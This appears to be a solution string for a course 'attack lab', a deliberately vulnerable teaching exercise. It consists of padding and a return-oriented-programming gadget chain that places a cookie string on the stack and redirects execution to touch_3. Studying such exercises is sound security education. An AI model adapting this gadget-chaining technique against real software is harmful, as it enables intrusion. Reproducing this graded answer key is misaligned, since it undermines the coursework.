20 20 20 20 20 20 20 20 /* pad */ 
20 20 20 20 20 20 20 20 /* pad */ 
20 20 20 20 20 20 20 20 /* pad */ 
20 20 20 20 20 20 20 20 /* pad */ 
20 20 20 20 20 20 20 20 /* pad */ 
AB 19 40 00 00 00 00 00 /* pop %rax; nop; ret */
20 00 00 00 00 00 00 00 /* $32 */
DD 19 40 00 00 00 00 00 /* movl %eax, %edx; nop; ret */
34 1A 40 00 00 00 00 00 /* movl %edx, %ecx; nop; ret */
13 1A 40 00 00 00 00 00 /* movl %ecx, %esi; nop; nop; ret */
AD 1A 40 00 00 00 00 00 /* movq %rsp, %rax; nop; ret */
A2 19 40 00 00 00 00 00 /* movq %rax, %rdi; ret */
D6 19 40 00 00 00 00 00 /* lea (%rdi, %rsi, 1), %rax; ret */
A2 19 40 00 00 00 00 00 /* movq %rax, %rdi; ret */
FA 18 40 00 00 00 00 00 /* touch_3 */
35 39 62 39 39 37 66 61 /* cookie */
